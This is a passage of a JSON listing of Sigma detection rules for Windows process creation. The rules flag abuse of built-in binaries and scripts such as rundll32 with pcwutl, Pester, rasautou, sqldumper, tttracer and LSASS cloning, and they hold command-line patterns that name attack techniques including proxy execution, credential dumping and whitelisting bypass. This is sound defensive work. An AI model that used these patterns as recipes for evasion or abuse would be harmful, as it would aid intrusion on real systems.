    "content": "title: Code Execution via Pcwutl.dll\nid: 9386d78a-7207-4048-9c9f-a93a7c2d1c05\nstatus: test\ndescription: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/\n    - https://twitter.com/harr0ey/status/989617817849876488\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-05\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'pcwutl'\n            - 'LaunchApplication'\n    condition: all of selection_*\nfalsepositives:\n    - Use of Program Compatibility Troubleshooter Helper\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pester.yml",
    "content": "title: Execute Code with Pester.bat as Parent\nid: 18988e1b-9087-4f8a-82fe-0414dce49878\nrelated:\n    - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e\n      type: similar\nstatus: test\ndescription: Detects code execution via Pester.bat (Pester - PowerShell module for testing)\nreferences:\n    - https://twitter.com/Oddvarmoe/status/993383596244258816\n    - https://twitter.com/_st0pp3r_/status/1560072680887525378\nauthor: frack113, Nasreddine Bencherchali\ndate: 2022-08-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_module:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        ParentCommandLine|contains: '\\WindowsPowerShell\\Modules\\Pester\\'\n    selection_cli:\n        ParentCommandLine|contains:\n            - '{ Invoke-Pester -EnableExit ;'\n            - '{ Get-Help \"'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of Pester for writing tests for PowerShell scripts and modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml",
    "content": "title: Execute Code with Pester.bat\nid: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e\nstatus: test\ndescription: Detects code execution via Pester.bat (Pester - PowerShell module for testing)\nreferences:\n    - https://twitter.com/Oddvarmoe/status/993383596244258816\n    - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-08\nmodified: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    powershell_module:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'Pester'\n            - 'Get-Help'\n    cmd_execution:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'pester'\n            - ';'\n    get_help:\n        CommandLine|contains:\n            - 'help'\n            - '\\?'\n    condition: powershell_module or (cmd_execution and get_help)\nfalsepositives:\n    - Legitimate use of Pester for writing tests for PowerShell scripts and modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml",
    "content": "title: PrintBrm ZIP Creation or Extraction\nid: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7\nstatus: test\ndescription: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/\nauthor: frack113\ndate: 2022-05-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\PrintBrm.exe'\n        CommandLine|contains|all:\n            - ' -f'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml",
    "content": "title: Pubprn.vbs Proxy Execution\nid: 1fb76ab8-fa60-4b01-bddd-71e89bf555da\nstatus: test\ndescription: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/\nauthor: frack113\ndate: 2022-05-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\pubprn.vbs'\n            - 'script:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml",
    "content": "title: DLL Execution via Rasautou.exe\nid: cd3d1298-eb3b-476c-ac67-12847de55813\nstatus: test\ndescription: Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n    - https://github.com/fireeye/DueDLLigence\n    - https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\n    definition: Since the options '-d' and '-p' were removed in Windows 10, this rule is relevant only for Windows versions before 10. As Windows 7 does not log the command line in event 4688 by default, detecting this attack requires Sysmon event ID 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud)\ndetection:\n    selection_img:\n        - Image|endswith: '\\rasautou.exe'\n        - OriginalFileName: 'rasdlui.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -d '\n            - ' -p '\n    condition: all of selection*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml",
    "content": "title: REGISTER_APP.VBS Proxy Execution\nid: 1c8774a0-44d4-4db0-91f8-e792359c70bd\nstatus: test\ndescription: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\register_app.vbs'\n            - '-register'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_remote.yml",
    "content": "title: Use of Remote.exe\nid: 4eddc365-79b4-43ff-a9d7-99422dc34b93\nstatus: test\ndescription: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.\nreferences:\n    - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-02\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\remote.exe'\n        - OriginalFileName: 'remote.exe'\n    condition: selection\nfalsepositives:\n    - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg).\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_replace.yml",
    "content": "title: Replace.exe Usage\nid: 9292293b-8496-4715-9db6-37028dcda4b3\nstatus: test\ndescription: Detects the use of Replace.exe which can be used to replace file with another file\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Replace/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nauthor: frack113\ndate: 2022-03-06\nmodified: 2024-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\replace.exe'\n    argument:\n        CommandLine|contains|windash: '-a'\n    condition: selection and argument\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml",
    "content": "title: Lolbin Runexehelper Use As Proxy\nid: cd71385d-fd9b-4691-9b98-2b1f7e508714\nstatus: test\ndescription: Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs\nreferences:\n    - https://twitter.com/0gtweet/status/1206692239839289344\n    - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/\nauthor: frack113\ndate: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\runexehelper.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml",
    "content": "title: Suspicious Runscripthelper.exe\nid: eca49c87-8a75-4f13-9c73-a5a29e845f03\nstatus: test\ndescription: Detects execution of powershell scripts via Runscripthelper.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2022-07-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Runscripthelper.exe'\n        CommandLine|contains: 'surfacecheck'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml",
    "content": "title: Use of Scriptrunner.exe\nid: 64760eef-87f7-4ed3-93fd-655668ea9420\nstatus: test\ndescription: The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ScriptRunner.exe'\n        - OriginalFileName: 'ScriptRunner.exe'\n    selection_cli:\n        CommandLine|contains: ' -appvscript '\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use when App-v is deployed\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml",
    "content": "title: Using SettingSyncHost.exe as LOLBin\nid: b2ddd389-f676-4ac4-845a-e00781a48e5f\nstatus: test\ndescription: Detects the use of SettingSyncHost.exe to run a hijacked binary\nreferences:\n    - https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin\nauthor: Anton Kutepov, oscd.community\ndate: 2020-02-05\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1574.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    system_utility:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    parent_is_settingsynchost:\n        ParentCommandLine|contains|all:\n            - 'cmd.exe /c'\n            - 'RoamDiag.cmd'\n            - '-outputpath'\n    condition: not system_utility and parent_is_settingsynchost\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml",
    "content": "title: Use Of The SFTP.EXE Binary As A LOLBIN\nid: a85ffc3a-e8fd-4040-93bf-78aff284d801\nstatus: test\ndescription: Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/264\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sftp.exe' # The \"sftp.exe\" located in the OpenSSH directory has no OriginalFileName :(\n        CommandLine|contains:\n            # Since \"-D\" is a valid flag for other usage we assume the user is going to enter a path\n            # Either a full one like \"C:\\Windows\\System32\\calc.exe\" or a relative one \"..\\..\\..\\Windows\\System32\\calc.exe\"\n            # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule)\n            - ' -D ..'\n            - ' -D C:\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml",
    "content": "title: Suspicious Driver Install by pnputil.exe\nid: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1\nstatus: test\ndescription: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\n    - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html\nauthor: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger\ndate: 2021-09-30\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '-i'\n            - '/install'\n            - '-a'\n            - '/add-driver'\n            - '.inf'\n        Image|endswith: '\\pnputil.exe'\n    condition: selection\nfalsepositives:\n    - Pnputil.exe being used may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml",
    "content": "title: Suspicious GrpConv Execution\nid: f14e169e-9978-4c69-acb3-1cff8200bc36\nstatus: test\ndescription: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors\nreferences:\n    - https://twitter.com/0gtweet/status/1526833181831200770\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'grpconv.exe -o'\n            - 'grpconv -o'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml",
    "content": "title: Dumping Process via Sqldumper.exe\nid: 23ceaf5c-b6f1-4a32-8559-f2ff734be516\nstatus: test\ndescription: Detects process dump via legitimate sqldumper.exe binary\nreferences:\n    - https://twitter.com/countuponsec/status/910977826853068800\n    - https://twitter.com/countuponsec/status/910969424215232518\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\nauthor: Kirill Kiryanov, oscd.community\ndate: 2020-10-08\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sqldumper.exe'\n        CommandLine|contains:\n            - '0x0110'\n            - '0x01100:40'\n    condition: selection\nfalsepositives:\n    - Legitimate MSSQL Server actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml",
    "content": "title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code\nid: fbd7c32d-db2a-4418-b92c-566eb8911133\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: obsolete\nstatus: test\ndescription: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: frack113\ndate: 2021-07-12\nmodified: 2022-10-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\SyncAppvPublishingServer.exe'\n        - OriginalFileName: 'syncappvpublishingserver.exe'\n    selection_cli:\n        CommandLine|contains: '\"n; '\n    condition: all of selection_*\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml",
    "content": "title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code\nid: 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1\nstatus: test\ndescription: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: frack113\ndate: 2021-07-16\nmodified: 2022-06-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\SyncAppvPublishingServer.vbs'\n            - ';'  # at a minimum, a semi-colon is required\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml",
    "content": "title: Potential DLL Injection Or Execution Using Tracker.exe\nid: 148431ce-4b70-403d-8525-fcc2993f29ea\nstatus: test\ndescription: Detects potential DLL injection and execution using \"Tracker.exe\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/\nauthor: 'Avneet Singh @v3t0_, oscd.community'\ndate: 2020-10-18\nmodified: 2023-01-09\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\tracker.exe'\n        - Description: 'Tracker'\n    selection_cli:\n        CommandLine|contains:\n            - ' /d '\n            - ' /c '\n    filter_msbuild1:\n        CommandLine|contains: ' /ERRORREPORT:PROMPT '\n    filter_msbuild2:\n        # Example:\n        #   GrandparentImage: C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Msbuild\\Current\\Bin\\MSBuild.exe\n        #   ParentCommandLine: \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe\" /nologo /nodemode:1 /nodeReuse:true /low:false\n        #   CommandLine: \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\Tracker.exe\" @\"C:\\Users\\user\\AppData\\Local\\Temp\\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp\" /c \"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.29.30133\\bin\\HostX86\\x64\\Lib.exe\"\n        ParentImage|endswith:\n            - '\\Msbuild\\Current\\Bin\\MSBuild.exe'\n            - '\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml",
    "content": "title: Use of TTDInject.exe\nid: b27077d6-23e6-45d2-81a0-e2b356eea5fd\nstatus: test\ndescription: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nauthor: frack113\ndate: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: 'ttdinject.exe'\n        - OriginalFileName: 'TTDInject.EXE'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml",
    "content": "title: Time Travel Debugging Utility Usage\nid: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a\nrelated:\n    - id: e76c8240-d68f-4773-8880-5c6f63595aaf\n      type: derived\nstatus: test\ndescription: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n    - https://twitter.com/mattifestation/status/1196390321783025666\n    - https://twitter.com/oulusoyum/status/1191329746069655553\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-06\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1218\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\tttracer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage by software developers/testers\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml",
    "content": "title: Lolbin Unregmp2.exe Use As Proxy\nid: 727454c0-d851-48b0-8b89-385611ab0704\nstatus: test\ndescription: Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/\nauthor: frack113\ndate: 2022-12-29\nmodified: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\unregmp2.exe'\n        - OriginalFileName: 'unregmp2.exe'\n    selection_cmd:\n        CommandLine|contains|windash: ' /HideWMP'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml",
    "content": "title: UtilityFunctions.ps1 Proxy Dll\nid: 0403d67d-6227-4ea8-8145-4e72db7da120\nstatus: test\ndescription: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/\nauthor: frack113\ndate: 2022-05-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'UtilityFunctions.ps1'\n            - 'RegSnapin '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml",
    "content": "title: Visual Basic Command Line Compiler Usage\nid: 7b10f171-7f04-47c7-9fa2-5be43c76e535\nstatus: test\ndescription: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Vbc/\nauthor: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\vbc.exe'\n        Image|endswith: '\\cvtres.exe'\n    condition: selection\nfalsepositives:\n    - Utilization of this tool should not be seen in enterprise environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml",
    "content": "title: Use of VisualUiaVerifyNative.exe\nid: b30a8bc5-e21b-4ca2-9420-0a94019ac56a\nstatus: test\ndescription: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\n    - https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/\n    - https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\VisualUiaVerifyNative.exe'\n        - OriginalFileName: 'VisualUiaVerifyNative.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate testing of Microsoft UI parts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml",
    "content": "title: Use of VSIISExeLauncher.exe\nid: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8\nstatus: test\ndescription: The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VSIISExeLauncher.exe'\n        - OriginalFileName: 'VSIISExeLauncher.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -p '\n            - ' -a '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml",
    "content": "title: Use of Wfc.exe\nid: 49be8799-7b4d-4fda-ad23-cafbefdebbc5\nstatus: test\ndescription: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-01\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\wfc.exe'\n        - OriginalFileName: 'wfc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by a software developer\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml",
    "content": "title: Potential Register_App.Vbs LOLScript Abuse\nid: 28c8f68b-098d-45af-8d43-8089f3e35403\nstatus: test\ndescription: Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20\n    - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs\nauthor: Austin Songer @austinsonger\ndate: 2021-11-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'cscript.exe'\n              - 'wscript.exe'\n    selection_cli:\n        CommandLine|contains: '.vbs -register ' # register_app.vbs\n    condition: all of selection*\nfalsepositives:\n    - Other VB scripts that leverage the same starting command line flags\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml",
    "content": "title: Potential Credential Dumping Via LSASS Process Clone\nid: c8da0dfd-4ed0-4b68-962d-13c9c884384e\nstatus: test\ndescription: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity\nreferences:\n    - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/\n    - https://twitter.com/Hexacorn/status/1420053502554951689\n    - https://twitter.com/SBousseaden/status/1464566846594691073?s=20\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden\ndate: 2021-11-27\nmodified: 2023-03-02\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Windows\\System32\\lsass.exe'\n        Image|endswith: '\\Windows\\System32\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml",
